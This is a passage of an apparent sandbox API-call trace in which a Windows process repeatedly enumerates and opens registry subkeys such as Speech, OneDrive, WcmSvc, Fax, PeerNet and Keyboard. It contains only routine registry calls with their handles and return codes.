lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.741] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.741] RegEnumKeyW (in: hKey=0x210, dwIndex=0x32, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.742] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.742] RegEnumKeyW (in: hKey=0x210, dwIndex=0x32, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.742] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.742] RegEnumKeyW (in: hKey=0x210, dwIndex=0x17, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.742] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.742] RegEnumKeyW (in: hKey=0x210, dwIndex=0x26, lpName=0x9aeb74, cchName=0xa | out: lpName="Speech") returned 0x0 [0057.742] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.742] RegCloseKey (hKey=0x214) returned 0x0 [0057.743] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.743] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1b, lpName=0x9aeb74, cchName=0xa | out: lpName="OneDrive") returned 0x0 [0057.743] RegCreateKeyExW (in: hKey=0x210, lpSubKey="OneDrive", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.743] RegCloseKey (hKey=0x214) returned 0x0 [0057.788] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.788] RegEnumKeyW (in: hKey=0x210, dwIndex=0x0, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.788] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.788] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2a, lpName=0x9aeb74, cchName=0xa | out: lpName="Unistore") returned 0x0 [0057.788] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Unistore", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.788] RegCloseKey (hKey=0x214) returned 0x0 [0057.788] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.789] RegEnumKeyW (in: hKey=0x210, dwIndex=0x3, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.789] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.789] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2d, lpName=0x9aeb74, cchName=0xa | out: lpName="WcmSvc") returned 0x0 [0057.789] RegCreateKeyExW (in: hKey=0x210, lpSubKey="WcmSvc", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.789] RegCloseKey (hKey=0x214) returned 0x0 [0057.789] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.789] RegEnumKeyW (in: hKey=0x210, dwIndex=0x29, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.789] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.790] RegEnumKeyW (in: hKey=0x210, dwIndex=0x6, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.790] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.790] RegEnumKeyW (in: hKey=0x210, dwIndex=0x3, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.790] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.790] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2b, lpName=0x9aeb74, cchName=0xa | out: lpName="UserData") returned 0x0 [0057.790] RegCreateKeyExW (in: hKey=0x210, lpSubKey="UserData", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.790] RegCloseKey (hKey=0x214) returned 0x0 [0057.791] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.791] RegEnumKeyW (in: hKey=0x210, dwIndex=0xc, lpName=0x9aeb74, cchName=0xa | out: lpName="Fax") returned 0x0 [0057.791] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Fax", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.791] RegCloseKey (hKey=0x214) returned 0x0 [0057.791] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.791] RegEnumKeyW (in: hKey=0x210, dwIndex=0xe, lpName=0x9aeb74, cchName=0xa | out: lpName="FTP") returned 0x0 [0057.791] RegCreateKeyExW (in: hKey=0x210, lpSubKey="FTP", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.791] RegCloseKey (hKey=0x214) returned 0x0 [0057.792] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.792] RegEnumKeyW (in: hKey=0x210, dwIndex=0x19, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.792] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.792] RegEnumKeyW (in: hKey=0x210, dwIndex=0x5, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.792] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.792] RegEnumKeyW (in: hKey=0x210, dwIndex=0x2f, lpName=0x9aeb74, cchName=0xa | out: lpName="Windows") returned 0x0 [0057.792] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Windows", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.792] RegCloseKey (hKey=0x214) returned 0x0 [0057.793] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.793] RegEnumKeyW (in: hKey=0x210, dwIndex=0x26, lpName=0x9aeb74, cchName=0xa | out: lpName="Speech") returned 0x0 [0057.793] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Speech", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.793] RegCloseKey (hKey=0x214) returned 0x0 [0057.793] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.793] RegEnumKeyW (in: hKey=0x210, dwIndex=0x11, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.793] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.793] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1f, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.793] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.794] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1d, lpName=0x9aeb74, cchName=0xa | out: lpName="PeerNet") returned 0x0 [0057.794] RegCreateKeyExW (in: hKey=0x210, lpSubKey="PeerNet", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.794] RegCloseKey (hKey=0x214) returned 0x0 [0057.794] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.794] RegEnumKeyW (in: hKey=0x210, dwIndex=0x3, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.794] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.794] RegEnumKeyW (in: hKey=0x210, dwIndex=0x1d, lpName=0x9aeb74, cchName=0xa | out: lpName="PeerNet") returned 0x0 [0057.794] RegCreateKeyExW (in: hKey=0x210, lpSubKey="PeerNet", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.795] RegCloseKey (hKey=0x214) returned 0x0 [0057.795] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.795] RegEnumKeyW (in: hKey=0x210, dwIndex=0x14, lpName=0x9aeb74, cchName=0xa | out: lpName="Keyboard") returned 0x0 [0057.795] RegCreateKeyExW (in: hKey=0x210, lpSubKey="Keyboard", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x9aeb38, lpdwDisposition=0x0 | out: phkResult=0x9aeb38*=0x214, lpdwDisposition=0x0) returned 0x0 [0057.795] RegCloseKey (hKey=0x214) returned 0x0 [0057.795] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.795] RegEnumKeyW (in: hKey=0x210, dwIndex=0x31, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.795] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.795] RegEnumKeyW (in: hKey=0x210, dwIndex=0x10, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.796] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.796] RegEnumKeyW (in: hKey=0x210, dwIndex=0x0, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.796] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x9aeb44*=0x35, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0057.796] RegEnumKeyW (in: hKey=0x210, dwIndex=0x32, lpName=0x9aeb74, cchName=0xa | out: lpName="") returned 0xea [0057.796] RegQueryInfoKeyW (in: hKey=0x210, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x9aeb44, lpcbMaxSubKeyLen=0x9aeb3c, lpcbMaxClassLen=0x0, lpcValues=0x0, lpcbMaxValueNameLen=0x0, 